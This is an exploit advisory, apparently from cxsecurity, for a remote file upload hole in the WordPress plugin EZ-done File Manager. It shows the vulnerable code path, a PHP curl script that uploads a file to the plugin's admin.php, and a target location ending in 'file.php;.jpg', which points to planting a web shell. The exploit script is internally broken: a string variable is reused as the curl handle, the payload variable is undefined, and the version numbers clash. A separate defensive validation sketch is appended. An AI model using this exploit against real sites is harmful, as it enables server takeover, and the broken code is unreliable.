Wordpress EZ-done File Manager 3.1.2 - Remote File Upload
2020-10-30 03:43:13 Author: cxsecurity.com


* Exploit Title: Wordpress EZ-done File Manager 3.1.2 - Remote File Upload
* Google Dork: N/A
* Date: 2020.10.28
* Exploit Author: Milad Karimi
* Vendor Homepage: https://wordpress.org/plugins/ez-done-file-manager/
* Software Link: https://wordpress.org/plugins/ez-done-file-manager/
* Category: webapps
* Version: 1.0
* Tested on: Windows 10, Firefox
* CVE: N/A

Vulnerable Source:

    379: move_uploaded_file move_uploaded_file($tmp_filepath, $target))
    375: $tmp_filepath = $_FILES['file']['tmp_name'];
    378: $target = $AddDir . sanitize_file_name($_FILES['file']['name']);
    352: $AddDir = $upload_dir['basedir'] . "/" . $MDP_target;
    351: $upload_dir = wp_upload_dir();
    349: $MDP_target = filter_var($_REQUEST['ftarget'], FILTER_SANITIZE_STRING);
    367: $_FILES['file']['name'] = str_replace(' ', '_', sanitize_file_name($_FILES['file']['name']));

Exploit:

    <?php
    $ch="file.jpg";
    $ch1 = curl_init("http://localhost/wordpress/wp-content/plugins/ez-done-file-manager/admin.php");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, array('zip'=>"@$sh"));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $result = curl_exec($ch);
    curl_close($ch);
    print "$result";
    ?>

Location File: http://localhost/wordpress/wp-content/plugins/ez-done-file-manager/file.php;.jpg
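A defensive sketch of the two checks the trace above is missing, added here as an example and not taken from the plugin or the advisory: the `ftarget` value is confined to the uploads base directory (`FILTER_SANITIZE_STRING` strips tags, not `../` path segments), and the client file name must carry a single allow-listed extension. The function names, the allow-list and the sample inputs are assumptions constructed for illustration.

```php
<?php
// Added example, not the plugin's code. Function names and the allow-list are assumptions.
const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif', 'pdf'];

// Resolve the requested sub-directory (the page's 'ftarget') and confirm it
// is an existing directory at or below $baseDir. Returns null otherwise.
function resolve_target_dir(string $baseDir, string $ftarget): ?string
{
    $base = realpath($baseDir);
    $dir  = realpath($baseDir . DIRECTORY_SEPARATOR . $ftarget);
    if ($base === false || $dir === false || !is_dir($dir)) {
        return null;
    }
    // realpath() has collapsed any "../", so a prefix comparison is now meaningful.
    if ($dir !== $base && strpos($dir, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $dir;
}

// Accept only "<name>.<ext>" with a single dot, a conservative character set
// and an allow-listed extension. Returns the name to store, or null.
function safe_upload_name(string $clientName): ?string
{
    $name = basename(str_replace('\\', '/', $clientName));
    if (!preg_match('/^[A-Za-z0-9_-]{1,100}\.([A-Za-z0-9]{1,5})$/D', $name, $m)) {
        return null;
    }
    return in_array(strtolower($m[1]), ALLOWED_EXT, true) ? $name : null;
}

// Constructed sample input: a throwaway uploads tree under the temp directory.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'uploads_demo_' . getmypid();
mkdir($base . DIRECTORY_SEPARATOR . 'docs', 0700, true);

foreach (['docs', '', '../', 'docs/../..', 'missing'] as $t) {
    $ok = resolve_target_dir($base, $t) !== null;
    printf("ftarget %-14s %s\n", var_export($t, true), $ok ? 'accepted' : 'rejected');
}
foreach (['photo.jpg', 'file.php;.jpg', 'shell.php.jpg', 'shell.php', 'a b.png'] as $n) {
    $ok = safe_upload_name($n) !== null;
    printf("name    %-14s %s\n", var_export($n, true), $ok ? 'accepted' : 'rejected');
}

// Remove the constructed directories again.
rmdir($base . DIRECTORY_SEPARATOR . 'docs');
rmdir($base);
```

In a WordPress handler both checks would run before `move_uploaded_file()`, after a capability check with `current_user_can()` and nonce verification.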



 



Article source: https://cxsecurity.com/issue/WLB-2020100184